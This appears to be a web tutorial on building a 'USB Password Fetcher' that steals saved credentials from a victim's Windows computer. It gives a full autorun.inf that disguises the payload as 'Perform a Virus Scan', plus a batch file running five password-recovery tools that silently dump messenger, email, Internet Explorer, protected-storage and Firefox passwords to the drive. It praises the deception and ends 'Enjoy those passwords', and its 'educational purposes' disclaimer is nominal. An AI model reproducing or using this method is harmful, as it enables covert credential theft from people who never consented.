One of the most
dangerous things we all do on a regular basis, for obvious reasons, is saving
our passwords in our browsers. We don't really think about the dangers in it,
we see the convenience in not having to input (in my case) 10 characters after
already typing our username or email every time we want to do something as
simple as log in to Facebook. Well this tutorial can show you how dangerous it
really is just storing your passwords for easy access to your accounts.
I want everyone to
keep in mind, this tutorial is strictly for educational purposes, & any
attempts to use these tactics for stealing information without permission is
solely on you. Don't go tattling on me.
What you'll need:
A USB Drive,
preferably 2GB+
A Windows computer
MessenPass: Used
for recovering passwords from various instant messenger applications.
Mail PassView:
Used to fetch passwords from popular email clients such as Outlook or
Thunderbird.
IE PassView: Used
to gather passwords stored by Internet Explorer (for those who just can't
accept change..)
Protected Storage
PassView: This program retrieves passwords from Windows 'protected storage'.
This is one of the most useful.
PasswordFox: Used
to fetch passwords & sensitive information from Firefox.
Now, there are
many others that you can add to this USB Password Fetcher, & if you know of
any that you feel should be added to this article, don't hesitate to comment.
Preparing the
drive
Before anything
else, we want to get all the applications ready to go & installed on the
USB drive. You'll ONLY need the executable (*.exe) files to be on the USB
drive. Download the 5 tools & extract the executables to the drive. With
the next step, we'll write a simple Autorun.inf file that will tell the victim's
computer to run these applications.
Making the drive
run automatically
What is an
autorun.inf?
An autorun.inf
file is a text file that can be used by the AutoRun and AutoPlay components of
Microsoft Windows operating systems. For the file to be discovered and used by
these component, it must be located in the root directory of a volume. As
Windows has acase-insensitive view of filenames, the autorun.inf file can be
stored as AutoRun.inf or Autorun.INF or any other case combination.
The AutoRun
component was introduced in Windows 95 as a way of reducing support costs.
AutoRun enabled application CD-ROMs to automatically launch a program which
could then guide the user through the installation process. By placing settings
in anautorun.inf file, manufacturers could decide what actions were taken when
their CD-ROM was inserted. The simplest autorun.inf files have just two
settings: one specifying an icon to represent the CD in Windows Explorer (or
"My Computer") and one specifying which application to run.
This file will
tell the victim's computer to run the various tasks we want the USB drive to
perform.
Writing the
Autorun.inf
Open Notepad &
paste the following code in the document:
[autorun]
open=launch.bat
ACTION= Perform a
Virus Scan
Now go to File
& click Save As..
Save the file as:
autorun.inf on the USB Drive's root.
Be sure to change
the Save As Type to All Files, otherwise you'll just be saving this as a text
file.
This alone won't
do what we need it to, but as you can see its launching a batch(*.bat) file
that we'll write next that will perform the password fetching process. The
reason we do this is because we can perform more advanced tasks with a batch
file than we can with an autorun.inf.
The ACTION= will
display to the end user what the USB Drive's function is. We both know that its
not performing a virus scan, but we wouldn't be very stealthy if it just read
STEALING YOUR PASSWORD. U MAD BRO? so we're going to disguise this as a healthy
computing task.
Writing the batch
file
Open up Notepad
again, & paste the following:
start mspass.exe
/stext mspass.txt
start mailpv.exe
/stext mailpv.txt
start iepv.exe
/stext iepv.txt
start pspv.exe
/stext pspv.txt
start
passwordfox.exe /stext passwordfox.txt
Aside from
launching the various applications, we're actually asking the computer to log
everything in an individual text (*.txt) file. Now if you really want to, you
could ask the computer to create one universal log file, but I wouldn't
recommend this. Its much easier to decipher this way.
Go to File, &
Save As.. and save this file as launch.bat on the USB drive's root. Be sure to
change the Save As Type to All Files, otherwise you'll just be saving this as a
text file.
Now everything
should be ready for testing!
Testing the USB Password Fetcher
Now keep in mind,
in some cases, Autorun could be completely disabled, in which this tactic will
not work, but let's get started with our first test.
Pop the USB Drive
in any available USB port on the victim machine, & an autorun prompt will
pop-up. The first option should say Perform A Virus Scan. Perform your
"virus scan" & silently, your password fetcher is throwing all
the information into various text files on your USB Drive. This process is
relatively quick, so don't fret if you blinked & missed it.
Enjoy those
passwords